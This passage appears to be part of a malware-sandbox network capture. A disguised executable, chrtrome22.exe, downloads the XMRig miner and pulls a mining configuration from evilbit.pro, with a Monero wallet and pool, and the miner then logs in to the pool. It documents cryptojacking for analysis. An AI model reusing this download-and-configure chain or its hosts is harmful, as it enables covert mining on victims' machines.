                                                                          x-ms-blob-content-md5: V7erW859Xkf9Fo4fDUN9Mg==
                                                                          x-ms-lease-status: unlocked
                                                                          x-ms-lease-state: available
                                                                          x-ms-blob-type: BlockBlob
                                                                          Content-Disposition: attachment; filename=xmrig-6.22.2-msvc-win64.zip
                                                                          x-ms-server-encrypted: true
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Fastly-Restarts: 1
                                                                          Accept-Ranges: bytes
                                                                          Age: 1579
                                                                          Date: Thu, 09 Jan 2025 07:42:11 GMT
                                                                          X-Served-By: cache-iad-kcgs7200085-IAD, cache-ewr-kewr1740033-EWR
                                                                          X-Cache: HIT, HIT
                                                                          X-Cache-Hits: 7492, 0
                                                                          X-Timer: S1736408531.015750,VS0,VE7
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 50 4b 03 04 14 00 00 00 00 00 31 75 63 59 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 50 4b 03 04 0a 00 00 00 00 00 1b 75 63 59 3d 16 f1 ff 3d 00 00 00 3d 00 00 00 1e 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 30 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78 65 20 2d 2d 62 65 6e 63 68 3d 31 30 4d 20 2d 2d 73 75 62 6d 69 74 0a 70 61 75 73 65 0a 50 4b 03 04 0a 00 00 00 00 00 1b 75 63 59 d3 c2 d1 ca 3c 00 00 00 3c 00 00 00 1d 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 62 65 6e 63 68 6d 61 72 6b 5f 31 4d 2e 63 6d 64 40 65 63 68 6f 20 6f 66 66 0a 63 64 20 2f 64 20 22 25 7e 64 70 30 22 0a 78 6d 72 69 67 2e 65 78
                                                                          Data Ascii: PK1ucYxmrig-6.22.2/PKucY===xmrig-6.22.2/benchmark_10M.cmd@echo offcd /d "%~dp0"xmrig.exe --bench=10M --submitpausePKucY<<xmrig-6.22.2/benchmark_1M.cmd@echo offcd /d "%~dp0"xmrig.ex
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 2c bc 65 82 94 30 37 e4 6f 02 0f a4 b1 a9 05 8b f3 5a 59 04 b1 63 69 69 5f 2c 87 ce 3f 84 0d 5f 26 0c 3c 23 4c 6b de de 5f ed 27 61 f0 4d 9c a1 b8 99 1d a0 3b 88 2a b4 58 83 41 94 41 09 9b ba 50 92 59 5f 48 84 0b ae e5 6a 52 5b ce 21 b3 73 36 69 27 7e ab 5c 70 bc 3d 76 ed 21 8c 19 cd 31 28 bc af 5c da eb 35 81 b8 ef 85 77 09 8f 05 85 ee e9 58 d6 62 9d 15 44 6e 6b 01 d5 de b1 98 38 4d aa e0 38 08 2c b0 ac 5a 26 16 ed 59 e1 2c 34 ab 89 ad 92 98 a1 e1 59 97 6a 83 f2 5d 80 7b d0 c1 f4 6d f7 a2 74 c4 60 1e 0d 14 62 81 e0 da 68 8e e8 7a 95 58 33 1f 94 4a 2b d6 d6 ed 66 12 7a 12 f6 de ff 91 d5 87 bd ee 9b 0b c3 3f b1 7f ac d3 70 6e c2 2d 39 3a 41 99 ff a8 bf 0e fb e3 93 a3 d1 66 73 27 be e4 83 1a e9 e2 76 dc 1f df 3f cd fb 43 f4 8f 9b d1 d5 e6 c6 1f 7f 7a 1a 1c
                                                                          Data Ascii: ,e07oZYcii_,?_&<#Lk_'aM;*XAAPY_HjR[!s6i'~\p=v!1(\5wXbDnk8M8,Z&Y,4Yj]{mt`bhzX3J+fz?pn-9:Afs'v?Cz
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 66 a2 b1 45 51 48 69 a2 b4 d8 eb 2e 5b b5 60 2f 55 9c 43 d4 a6 8d 82 0e 21 48 44 9b fb 36 6e 6f 9f c9 63 ad 42 33 d7 88 ed 49 0a 0c 61 64 73 2f 5c f6 dc a5 dd 31 f7 65 ad 60 d1 c1 44 a3 c3 9a db 56 26 d7 84 c3 f1 fd 7c db 29 e5 7b 3e fc 05 50 4b 03 04 14 00 00 00 08 00 1b 75 63 59 ce 31 a4 ec fc 01 00 00 35 03 00 00 22 00 00 00 78 6d 72 69 67 2d 36 2e 32 32 2e 32 2f 73 6f 6c 6f 5f 6d 69 6e 65 5f 65 78 61 6d 70 6c 65 2e 63 6d 64 6d 52 c1 72 da 30 10 3d 87 af d8 66 a6 d3 4b 70 a0 43 5a f0 64 72 08 50 4a 02 0d 43 6b 12 b8 64 84 b5 c6 0a b2 e4 58 72 01 1f fa ed 5d c9 21 49 67 3a a3 c3 6a f5 f6 e9 bd 27 85 21 0c f7 2c cb 25 c2 9a d9 38 85 44 50 99 e8 02 32 a1 84 da c0 54 2b 2c 34 18 2d 75 23 0c 69 c1 37 5d 64 cc ba f2 64 9f 15 62 13 e0 1e a1 a9 e1 52 69 8e c0
                                                                          Data Ascii: fEQHi.[`/UC!HD6nocB3Iads/\1e`DV&|){>PKucY15"xmrig-6.22.2/solo_mine_example.cmdmRr0=fKpCZdrPJCkdXr]!Ig:j'!,%8DP2T+,4-u#i7]ddbRi
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 30 37 98 98 b1 c9 80 c8 7a 43 64 65 d7 20 83 25 2d 80 e2 8d a0 7a 34 70 26 b1 e4 1e 00 e2 8d d0 62 c9 f5 1c 44 54 2c e5 2e 40 58 66 b2 84 da 9b be a6 f9 04 e3 26 b1 ad 72 60 72 84 fa ab 08 59 77 0d 3c 19 b6 cb 20 9c 69 be 58 f2 63 a0 6e 19 86 83 9e 47 d0 64 0e ba 0b 41 d3 00 ca a0 2f 4b 47 80 e3 b2 4c 04 98 2d 6b 45 3a 8b 12 8c 5b 18 02 04 e3 66 b1 94 08 30 14 a0 88 2c 07 59 0b 96 99 38 4b 42 2c b9 10 74 46 da 92 b3 01 82 8c 9e b2 0a 8c fe 92 89 1a 62 01 c6 bb 21 63 d0 65 4a 7e 25 96 e5 22 6e c7 6a 22 32 63 55 70 83 5f 00 7f e8 2d ea d7 8d a5 48 e3 ad 3f d1 e8 89 34 d6 72 1b 59 bc 6f 41 32 62 a2 88 6d fc 48 80 0d 5d e5 f0 ad 64 db 20 5e 08 8d 1a 1e 0c 7a 19 c4 44 0d f3 bc 48 43 59 30 f9 87 ca 50 c8 fc fd 90 49 fb 22 a8 05 07 7d 82 cc ff 52 01 b2 5a 7d c8
                                                                          Data Ascii: 07zCde %-z4p&bDT,.@Xf&r`rYw< iXcnGdA/KGL-kE:[f0,Y8KB,tFb!ceJ~%"nj"2cUp_-H?4rYoA2bmH]d ^zDHCY0PI"}RZ}
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: cd 69 24 3f 06 c9 35 3a dc 9f 1a 46 0e b0 23 53 42 21 a8 e4 1b df 82 b4 9e 1c 40 82 a0 73 80 63 41 02 9d 67 48 4a f3 ba 30 c2 6c 28 64 c6 2a 0a 39 00 7c 03 73 65 20 2f 31 08 6a e0 ca 7f d7 10 c3 63 1f be 8a 12 ee 17 61 43 75 8d f0 43 38 5e 80 63 3f 8d de 86 b6 25 99 45 05 9b 87 90 02 42 2d 37 42 10 85 41 a5 87 d2 28 61 9a a4 8d a0 55 0b 22 fa 85 b9 92 18 66 51 74 0b f0 e9 c5 2c da 31 28 88 4e 62 40 d2 08 df fa 67 3e 91 60 a7 09 de a1 d0 38 9f 8f 8f b9 0f 3d 82 14 40 0e 22 07 f8 84 f8 51 02 c3 48 34 e8 ff e5 7f a8 a0 38 9f e6 64 41 38 cd e4 4f 7d e6 fb 99 2f 80 01 a9 02 60 be e0 5b 9c 37 cf 4c 7d 08 4f 17 3c dd 21 57 c8 07 3c 2d 21 17 80 d9 40 8e 90 03 a0 6d c0 d3 0a e0 48 39 8b 79 3d 89 e8 43 83 ca 0b e8 af 70 05 57 0f 06 fc a1 67 e8 6e 00 0c 14 d0 c7 80
                                                                          Data Ascii: i$?5:F#SB!@scAgHJ0l(d*9|se /1jcaCuC8^c?%EB-7BA(aU"fQt,1(Nb@g>`8=@"QH48dA8O}/`[7L}O<!W<-!@mH9y=CpWgn
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: e3 f3 a7 00 d6 c7 98 eb 9e db 1e ce 0d 33 ae d3 d7 1b 09 75 eb 5e 60 a5 79 53 a4 25 f0 84 9d a3 7a fb 38 79 91 3a 3b 67 35 2c 18 2b 62 e8 a3 8a a2 3d 99 c5 56 35 8e 1d 4c 5b f7 b1 69 d2 b7 95 18 ec 17 ff f4 b2 c0 69 5b 97 32 89 50 d4 9b 45 16 a1 89 9b 18 e9 25 82 af 7c b6 1f f8 40 5b a7 d0 e9 19 9d dc 4c a9 d6 f0 f3 dc ff 86 f6 61 ac a2 7f 79 b8 6e 90 f7 49 a7 d0 1d 57 3c 97 3c 5a 30 7b cb a9 6c 93 f7 0d 36 fb f1 4b c2 cc d9 9e 6a b3 1c 8a 8c ec db 0f e9 8a 1c 0b b4 69 d6 5e b8 fa c4 78 42 90 99 c9 67 10 c0 03 20 80 bb b8 01 3c 95 b1 c6 e3 8e 69 2a ce 0c e0 d5 7f 71 00 83 4d 9d 0a 60 7e 17 2a 95 81 84 ee 1c 58 6e 2a d0 66 4d 13 46 1a bf 06 ad 0e 5e 1b bf 14 af 03 83 02 82 16 af 0b e3 b5 f5 f1 78 0e 09 47 22 b1 38 d5 5d 69 46 77 0e e2 e4 47 63 50 48 34 3a
                                                                          Data Ascii: 3u^`yS%z8y:;g5,+b=V5L[ii[2PE%|@[LaynIW<<Z0{l6Kji^xBg <i*qM`~*Xn*fMF^xG"8]iFwGcPH4:
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 9f d4 1f c5 b6 ec 70 9a 73 37 39 bc b1 4e d1 65 37 29 5f 72 fd d9 d3 3d c1 ea 5a 4a 31 c7 16 3b 17 4c a4 38 aa 99 10 0f 25 2c 28 9a 7c 15 b7 31 af d9 b2 6b 9f 92 cb 96 de 1c d6 c4 a3 6b b8 96 93 5b 9c 0b b5 82 8c 4b 97 74 2d d9 9e 6e bf 59 d6 50 79 e1 e7 7b 65 e1 a4 84 6b fd bd b2 b6 03 95 63 8c de e4 67 2e 1a c7 8d 43 26 8c 57 d6 a0 dc 92 b3 b4 eb 73 ae 6f 0f 80 8b f6 77 ce cf 9d 2c d5 ac f9 1d 8b 71 ef 81 f2 41 a9 e6 cf e7 5d 4f 8a c3 89 18 31 10 fb 63 3f c4 be 78 f6 70 62 ce 8c d5 fa 77 bc 6d a7 4e ed da e0 8c 6e f8 43 56 e0 92 30 15 2f 09 4b 4c 69 12 fc ae 09 bf 08 56 9f b2 73 de 34 f5 6e e4 70 12 ce 95 e1 17 1e 81 84 33 21 8a 11 02 4e f6 8c 68 44 78 fa 71 7e 2e 03 c8 d1 a7 c4 82 a8 a6 d3 5c 2d 80 1a fe 9b 29 a0 e3 ca 1c ba 42 31 fb 61 4b 99 75 62 13
                                                                          Data Ascii: ps79Ne7)_r=ZJ1;L8%,(|1kk[Kt-nYPy{ekcg.C&Wsow,qA]O1c?xpbwmNnCV0/KLiVs4np3!NhDxq~.\-)B1aKub
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 10 25 3d 3a d1 77 b1 5d 29 2d c3 70 fd ab d9 89 ad 92 19 bb 3a 03 08 03 9b de 9f a9 0a 93 6e 31 90 3c bd 43 c8 9f 2f ed fe 23 8b 38 f1 a3 4e 2a 2c df 7b bc 63 5e 47 a4 2a 62 dc 69 42 b9 cf cf 7f e1 8d c8 24 ed e7 9d 7b f8 3e ff 49 db d5 0f 2e 1a 06 1b 5f 60 c0 89 bc 71 20 47 04 4f e5 08 41 3f a1 b8 50 08 29 72 33 53 44 dc b4 f0 5b e5 fa f5 7d 8d 95 14 5c ed c7 09 61 06 95 f2 f5 ae c0 0f ee 0a a4 c0 70 2a 25 10 af 08 cf 9d 8a 52 69 7b 72 00 8d 4a a7 06 81 5b 02 95 16 41 a5 f9 31 c8 a0 87 3a bc 60 2a 24 71 d3 db 03 49 38 77 12 0d f9 09 0c 91 9a 3a 9a 70 f2 c3 52 58 4f 5b 07 af 0f c3 7a 78 24 3f 70 49 3c 42 fe f3 ae 34 bf 95 13 ee 88 3e cb cb e8 3c f4 c4 71 db 96 cf a3 ac 24 d5 d0 e7 44 a5 51 8d f2 da 1c 09 cc d9 91 80 ee c7 c1 41 5d 73 ef 77 cd 21 2e 7a 95
                                                                          Data Ascii: %=:w])-p:n1<C/#8N*,{c^G*biB${>I._`q GOA?P)r3SD[}\ap*%Ri{rJ[A1:`*$qI8w:pRXO[zx$?pI<B4><q$DQA]sw!.z
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 72 59 fe 32 4f c1 1b 75 2b 9d 67 63 1c ba 46 7c 2b d7 9a d4 77 46 df 90 73 8f 7d 97 16 d5 bd dd d7 3d bb 9d af 53 74 b2 e2 42 dd b6 32 5a 6f 92 88 e8 d6 15 1b 29 dd 52 c7 4d 4b 12 42 ca fb af 9f 33 19 22 c7 bf 70 09 ec fe 90 74 c3 ca 5d d8 f3 88 d9 ab 0f 77 d4 f4 9c cd 1c 0f 7f 5a 51 32 a6 57 bd a8 b4 79 27 39 6c bd 62 f7 97 09 ac d3 22 61 47 a9 e7 89 91 d5 75 b6 93 68 6b fd 72 fc 85 d8 da 87 ed 78 23 73 4b 95 83 89 e8 1e 70 55 ef fe be 7a 7c f8 44 74 33 60 9d 43 7c 20 21 fe df 70 45 ff e1 8b c1 74 97 48 44 c9 c0 b2 d3 5d 40 e8 1b c1 8f 82 e7 7e 6f e1 c5 8b 71 7e 8c d3 d7 06 9f f9 75 60 1d 03 cf 9f fc a3 9e fa 49 ed d1 b0 45 76 c3 aa 48 72 db 4d a1 83 6d ce 31 4b e1 84 2a 3e a1 af 52 e2 68 61 3c b8 71 26 1c 82 13 0a e0 84 7d 18 a9 74 87 f2 88 ed 94 36 b7
                                                                          Data Ascii: rY2Ou+gcF|+wFs}=StB2Zo)RMKB3"pt]wZQ2Wy'9lb"aGuhkrx#sKpUz|Dt3`C| !pEtHD]@~oq~u`IEvHrMm1K*>Rha<q&}t6
                                                                          2025-01-09 07:42:11 UTC1378INData Raw: 2a 19 18 19 25 10 d5 6f 4f 97 a4 ab 09 39 22 90 0c bf 3d 33 d7 c0 48 fd 04 46 b2 fd f6 9c 6c 41 23 0b 9a 15 fe a2 02 d2 79 4c 37 02 07 31 58 54 0c c0 5f 54 82 df 3c 81 3f 22 f0 2d 8c 6f 65 fa ae 84 5f 2f f0 6d 8c 6f 27 bc 5b cf 5c e0 1b 26 30 5e ca b8 0f bf cb bb f6 20 fc 17 02 af 62 bc 1a bf 73 4d dd 08 8f 11 7c 6a 18 af c3 ef 7d 82 cf 1f 05 7d 80 f1 46 fc 2e 15 78 9a c0 9b 18 97 50 f3 2b 05 de 4d e0 f1 06 c2 4d 3c 84 74 9f 0b fc d4 1d 8c 27 30 6e 66 bc 07 e1 8f 0b fa 24 c6 53 18 ef 46 f8 20 81 a7 32 2e c6 4c 79 11 f0 ef 09 3e 2a e3 e9 8c f7 5c 0c fc b4 c0 33 80 ec 48 01 18 d8 f1 bd d1 68 9e 8d aa 07 b0 35 1e 5f 53 96 df 9a 60 30 a8 9e b8 17 6b 36 4a aa 77 66 62 8e e3 e5 a9 e2 13 e7 f4 0e df 0a d4 3e 34 28 f7 b7 49 92 53 7b dd a9 55 aa de 29 89 19 01 df
                                                                          Data Ascii: *%oO9"=3HFlA#yL71XT_T<?"-oe_/mo'[\&0^ bsM|j}}F.xP+MM<t'0nf$SF 2.Ly>*\3Hh5_S`0k6Jwfb>4(IS{U)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.449732172.67.144.264436568C:\Users\user\Desktop\chrtrome22.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:42:13 UTC166OUTGET /config.json HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                          Host: evilbit.pro
                                                                          Connection: Keep-Alive
                                                                          2025-01-09 07:42:14 UTC865INHTTP/1.1 200 OK
                                                                          Date: Thu, 09 Jan 2025 07:42:14 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 584
                                                                          Connection: close
                                                                          Last-Modified: Sat, 04 Jan 2025 09:38:19 GMT
                                                                          ETag: "248-62ade27cedc25"
                                                                          Accept-Ranges: bytes
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h3QCRk7yZD%2Bl7Wytl9VXstsVq4igB2peTjPvaQXJ5QPCTLiscfPASPUHVJTRVVMUmDR5rIyCeM%2B9YZY0%2BAkCMWV0bWaPMMwBuJU5miOey6HyKtjeErtAgFysL2BG4A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff2ca1a8b4d42e3-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1702&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=780&delivery_rate=1621321&cwnd=209&unsent_bytes=0&cid=6ccff0f94d5fc7b3&ts=460&x=0"
                                                                          2025-01-09 07:42:14 UTC504INData Raw: 7b 0a 20 20 20 20 22 61 75 74 6f 73 61 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 63 70 75 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 6f 70 65 6e 63 6c 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 22 63 75 64 61 22 3a 20 66 61 6c 73 65 2c 0a 20 20 20 20 22 70 6f 6f 6c 73 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 75 72 6c 22 3a 20 22 70 6f 6f 6c 2e 73 75 70 70 6f 72 74 78 6d 72 2e 63 6f 6d 3a 34 34 33 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 75 73 65 72 22 3a 20 22 34 35 4c 75 34 5a 7a 63 70 36 34 65 74 64 6f 56 6e 63 39 6a 53 55 38 34 57 42 79 67 43 37 70 35 6d 64 72 6f 77 5a 69 63 36 4c 56 44 5a 45 52 73 44 73 7a 46 67 63 52 63 46 36 33 47 6d 36 6b 56 63 37 58 73 76 67 70 76 68 48 33 36 53 4e 66 43 6d 55
                                                                          Data Ascii: { "autosave": true, "cpu": true, "opencl": false, "cuda": false, "pools": [ { "url": "pool.supportxmr.com:443", "user": "45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmU
                                                                          2025-01-09 07:42:14 UTC80INData Raw: 50 56 54 61 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 6c 73 22 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 5d 0a 7d 0a
                                                                          Data Ascii: PVTa", "keepalive": true, "tls": true } ]}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.449734141.94.96.1444432312C:\xmrig\xmrig-6.22.2\xmrig.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-09 07:42:16 UTC561OUTData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 35 4c 75 34 5a 7a 63 70 36 34 65 74 64 6f 56 6e 63 39 6a 53 55 38 34 57 42 79 67 43 37 70 35 6d 64 72 6f 77 5a 69 63 36 4c 56 44 5a 45 52 73 44 73 7a 46 67 63 52 63 46 36 33 47 6d 36 6b 56 63 37 58 73 76 67 70 76 68 48 33 36 53 4e 66 43 6d 55 41 62 31 54 77 62 53 47 37 50 56 54 61 22 2c 22 70 61 73 73 22 3a 22 78 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 32 32 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 34 39 2e 32 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 61 6c 67 6f 22 3a 5b 22 63 6e
                                                                          Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45Lu4Zzcp64etdoVnc9jSU84WBygC7p5mdrowZic6LVDZERsDszFgcRcF63Gm6kVc7XsvgpvhH36SNfCmUAb1TwbSG7PVTa","pass":"x","agent":"XMRig/6.22.2 (Windows NT 10.0; Win64; x64) libuv/1.49.2 msvc/2019","algo":["cn
                                                                          2025-01-09 07:42:16 UTC539INData Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 62 61 65 30 36 64 66 64 2d 38 38 32 32 2d 34 62 64 33 2d 61 37 30 34 2d 35 37 66 63 33 38 61 30 32 63 39 32 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 31 66 62 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 32 31 33 64 34 34 34 61 35 39 31 32 65 37 34 62 33 66 32 33 62 38 31 64 62 66 37 63 39 30 30 61 39 35 33 39 63 32 36 64 66 62 33 36 66 36 62 30 35 63 66 38 39 63 32 33 63 32 31 61 30 65 64
                                                                          Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"bae06dfd-8822-4bd3-a704-57fc38a02c92","job":{"blob":"1010d1fbfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea300000000213d444a5912e74b3f23b81dbf7c900a9539c26dfb36f6b05cf89c23c21a0ed
                                                                          2025-01-09 07:42:21 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 64 66 62 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 38 39 30 31 39 64 34 38 30 37 66 36 61 32 66 62 65 38 65 36 65 38 34 30 65 66 38 36 35 38 36 32 35 30 62 31 35 33 66 31 39 33 38 37 38 39 32 34 65 62 64 31 63 39 62 34 34 66 63 64 64 65 33 66 31 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 4f 56 58 75 36 48 75 73 4c 51 2b 74 35 4b 49 30 65 54 50 63 77 4c 53 2b 66 48 6b 32 22 2c 22 74 61 72 67 65 74 22 3a 22 38
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010ddfbfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea30000000089019d4807f6a2fbe8e6e840ef86586250b153f193878924ebd1c9b44fcdde3f12","job_id":"OVXu6HusLQ+t5KI0eTPcwLS+fHk2","target":"8
                                                                          2025-01-09 07:42:28 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 64 64 66 62 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 38 33 65 36 33 38 61 64 37 35 37 36 65 64 31 62 62 39 64 35 64 30 63 36 62 30 31 63 63 61 39 66 35 31 36 61 65 62 31 34 36 32 36 31 61 31 36 64 66 38 32 65 66 61 61 38 36 38 38 36 31 32 62 33 31 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 4b 38 4a 6a 57 68 57 61 46 78 34 65 6e 33 71 78 77 2f 58 2f 75 67 59 2f 78 70 37 4d 22 2c 22 74 61 72 67 65 74 22 3a 22 63
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010ddfbfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea30000000083e638ad7576ed1bb9d5d0c6b01cca9f516aeb146261a16df82efaa8688612b312","job_id":"K8JjWhWaFx4en3qxw/X/ugY/xp7M","target":"c
                                                                          2025-01-09 07:42:33 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 39 66 62 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 39 34 30 61 30 38 35 39 64 38 31 34 62 30 37 62 65 38 37 32 64 32 66 63 62 63 61 39 37 62 34 61 31 33 62 30 36 62 35 61 38 39 63 33 33 34 66 32 38 31 64 64 65 35 34 62 38 32 31 61 38 32 35 34 31 34 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 65 68 46 76 54 78 2b 48 44 43 6c 68 59 67 35 6c 53 72 51 78 4e 71 4d 32 4d 51 73 52 22 2c 22 74 61 72 67 65 74 22 3a 22 63
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e9fbfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea300000000940a0859d814b07be872d2fcbca97b4a13b06b5a89c334f281dde54b821a825414","job_id":"ehFvTx+HDClhYg5lSrQxNqM2MQsR","target":"c
                                                                          2025-01-09 07:42:46 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 36 66 62 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 66 31 31 32 32 36 31 65 62 36 39 30 31 63 31 66 63 62 61 62 63 63 62 34 36 65 36 30 61 39 64 31 36 62 39 35 33 30 62 38 37 62 33 31 31 64 65 61 62 66 37 63 32 63 33 66 65 38 30 33 36 37 36 33 31 37 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 37 37 52 39 63 34 61 53 48 62 34 59 72 68 36 6e 31 63 37 4f 69 55 6e 2f 67 78 4e 54 22 2c 22 74 61 72 67 65 74 22 3a 22 63
                                                                          Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f6fbfdbb0618b7029a51e634960100d84e550beedff159c6845536d30920d0c6194fae6ea300000000f112261eb6901c1fcbabccb46e60a9d16b9530b87b311deabf7c2c3fe803676317","job_id":"77R9c4aSHb4Yrh6n1c7OiUn/gxNT","target":"c
                                                                          2025-01-09 07:42:59 UTC420INData Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 32 66 63 66 64 62 62 30 36 31 38 62 37 30 32 39 61 35 31 65 36 33 34 39 36 30 31 30 30 64 38 34 65 35 35 30 62 65 65 64 66 66 31 35 39 63 36 38 34 35 35 33 36 64 33 30 39 32 30 64 30 63 36 31 39 34 66 61 65 36 65 61 33 30 30 30 30 30 30 30 30 64 34 30 37 31 65 39 64 64 62 32 31 37 65 37 36 66 37 66 66 32 66 38 30 31 35 34 37 66 36 66 64 61 34 65 64 61 35 62 61 63 35 34 63 36 35 65 34 65 62 64 33 36 32 38 63 64 31 39 31 38 65 66 63 31 62 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 43 63 63 6b 69 4f 2b 37 72 59 78 31 74 2f 64 78 78 4c 70 71 57 6d 